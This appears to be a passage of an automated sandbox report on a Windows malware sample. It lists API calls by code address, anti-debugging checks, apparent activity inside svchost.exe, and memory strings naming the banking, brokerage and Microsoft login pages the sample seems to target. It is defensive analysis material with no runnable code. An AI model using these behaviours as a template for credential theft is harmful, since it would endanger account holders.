            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AC4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00AC4696
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00ACC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00ACC9C7
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00ACC93C FindFirstFileW,FindClose,0_2_00ACC93C
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00ACF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00ACF200
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00ACF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00ACF35D
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00ACF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00ACF65E
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AC3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00AC3A2B
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AC3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00AC3D4E
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00ACBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00ACBF27
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032ABAB0 FindFirstFileW,FindNextFileW,FindClose,4_2_032ABAB0
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A64AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00A64AFE
            Source: F56GKLK7U4.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
            Source: F56GKLK7U4.4.drBinary or memory string: tasks.office.comVMware20,11696503903o
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
            Source: F56GKLK7U4.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696503903}
            Source: F56GKLK7U4.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696503903x
            Source: F56GKLK7U4.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696503903h
            Source: F56GKLK7U4.4.drBinary or memory string: bankofamerica.comVMware20,11696503903x
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696503903]
            Source: F56GKLK7U4.4.drBinary or memory string: global block list test formVMware20,11696503903
            Source: hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3853480914.0000000000FAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
            Source: firefox.exe, 00000008.00000002.1845031389.0000015A6EB6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
            Source: F56GKLK7U4.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
            Source: F56GKLK7U4.4.drBinary or memory string: ms.portal.azure.comVMware20,11696503903
            Source: F56GKLK7U4.4.drBinary or memory string: interactivebrokers.comVMware20,11696503903
            Source: F56GKLK7U4.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696503903u
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903
            Source: F56GKLK7U4.4.drBinary or memory string: AMC password management pageVMware20,11696503903
            Source: F56GKLK7U4.4.drBinary or memory string: turbotax.intuit.comVMware20,11696503903t
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903}
            Source: netbtugc.exe, 00000004.00000002.3848803016.000000000352E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903x
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
            Source: F56GKLK7U4.4.drBinary or memory string: outlook.office365.comVMware20,11696503903t
            Source: F56GKLK7U4.4.drBinary or memory string: outlook.office.comVMware20,11696503903s
            Source: F56GKLK7U4.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696503903
            Source: F56GKLK7U4.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696503903d
            Source: F56GKLK7U4.4.drBinary or memory string: dev.azure.comVMware20,11696503903j
            Source: F56GKLK7U4.4.drBinary or memory string: discord.comVMware20,11696503903f
            Source: F56GKLK7U4.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696503903
            Source: C:\Users\user\Desktop\opp46lGmxd.exeAPI call chain: ExitProcess graph end nodegraph_0-98970
            Source: C:\Users\user\Desktop\opp46lGmxd.exeAPI call chain: ExitProcess graph end nodegraph_0-99069
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E rdtsc 2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417823 LdrLoadDll,2_2_00417823
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AD41FD BlockInput,0_2_00AD41FD
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A63B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00A63B4C
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A95CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00A95CCC
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00ADC304 LoadLibraryA,GetProcAddress,0_2_00ADC304
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_03D83530 mov eax, dword ptr fs:[00000030h]0_2_03D83530
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_03D834D0 mov eax, dword ptr fs:[00000030h]0_2_03D834D0
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_03D81ED0 mov eax, dword ptr fs:[00000030h]0_2_03D81ED0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h]2_2_03B5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h]2_2_03B5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B663FF mov eax, dword ptr fs:[00000030h]2_2_03B663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h]2_2_03BD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h]2_2_03BD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC3CD mov eax, dword ptr fs:[00000030h]2_2_03BEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB63C0 mov eax, dword ptr fs:[00000030h]2_2_03BB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C310 mov ecx, dword ptr fs:[00000030h]2_2_03B2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50310 mov ecx, dword ptr fs:[00000030h]2_2_03B50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD437C mov eax, dword ptr fs:[00000030h]2_2_03BD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov ecx, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA352 mov eax, dword ptr fs:[00000030h]2_2_03BFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD8350 mov ecx, dword ptr fs:[00000030h]2_2_03BD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h]2_2_03B402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h]2_2_03B402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov ecx, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h]2_2_03B6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h]2_2_03B6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2823B mov eax, dword ptr fs:[00000030h]2_2_03B2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2826B mov eax, dword ptr fs:[00000030h]2_2_03B2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A250 mov eax, dword ptr fs:[00000030h]2_2_03B2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36259 mov eax, dword ptr fs:[00000030h]2_2_03B36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB8243 mov eax, dword ptr fs:[00000030h]2_2_03BB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB8243 mov ecx, dword ptr fs:[00000030h]2_2_03BB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C061E5 mov eax, dword ptr fs:[00000030h]2_2_03C061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B70185 mov eax, dword ptr fs:[00000030h]2_2_03B70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]2_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]2_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h]2_2_03BD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h]2_2_03BD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B601F8 mov eax, dword ptr fs:[00000030h]2_2_03B601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]2_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]2_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60124 mov eax, dword ptr fs:[00000030h]2_2_03B60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov ecx, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF0115 mov eax, dword ptr fs:[00000030h]2_2_03BF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C156 mov eax, dword ptr fs:[00000030h]2_2_03B2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC8158 mov eax, dword ptr fs:[00000030h]2_2_03BC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]2_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]2_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov ecx, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF60B8 mov eax, dword ptr fs:[00000030h]2_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC80A8 mov eax, dword ptr fs:[00000030h]2_2_03BC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3208A mov eax, dword ptr fs:[00000030h]2_2_03B3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03B2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B720F0 mov ecx, dword ptr fs:[00000030h]2_2_03B720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03B2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B380E9 mov eax, dword ptr fs:[00000030h]2_2_03B380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB60E0 mov eax, dword ptr fs:[00000030h]2_2_03BB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB20DE mov eax, dword ptr fs:[00000030h]2_2_03BB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6030 mov eax, dword ptr fs:[00000030h]2_2_03BC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A020 mov eax, dword ptr fs:[00000030h]2_2_03B2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C020 mov eax, dword ptr fs:[00000030h]2_2_03B2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
